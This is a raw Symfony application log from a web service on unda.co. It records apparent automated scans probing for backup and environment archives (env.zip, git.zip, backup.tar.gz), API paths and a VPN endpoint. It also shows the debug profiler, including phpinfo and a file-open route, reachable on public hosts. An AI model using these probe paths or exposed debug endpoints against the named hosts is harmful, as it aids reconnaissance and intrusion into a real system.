[2025-12-17 17:59:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /vpnsvc/connect.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /vpnsvc/connect.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 17:59:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2cc755","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/2cc755?panel=time","method":"GET"} []
[2025-12-17 17:59:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 18:08:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a19422","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a19422?panel=time","method":"GET"} []
[2025-12-17 18:08:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 18:09:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 18:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=request","method":"GET"} []
[2025-12-17 18:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 18:16:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 18:19:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=twig","method":"GET"} []
[2025-12-17 18:19:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:20:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:23:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=request","method":"GET"} []
[2025-12-17 18:23:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:28:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:30:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=time","method":"GET"} []
[2025-12-17 18:30:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 18:30:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 18:30:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 18:30:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 18:30:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 18:30:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 18:30:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 18:30:53] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:30:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:30:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:30:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 18:30:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 18:30:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 18:30:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 18:30:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 18:30:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 18:30:54] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 18:34:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-17 18:34:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:34:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:34:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 18:35:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 18:35:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 18:35:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 18:35:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 18:35:40] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 18:35:40] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 18:35:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 18:35:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:40] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:40] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 18:35:40] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 18:35:40] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 18:35:41] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
[2025-12-17 18:35:41] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 18:35:41] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:41] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 18:35:41] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 18:35:41] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 18:35:41] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 18:37:06] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle&line=0","method":"GET"} []
[2025-12-17 18:43:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=security","method":"GET"} []
[2025-12-17 18:43:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 18:45:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=twig","method":"GET"} []
[2025-12-17 18:45:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 18:53:12] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
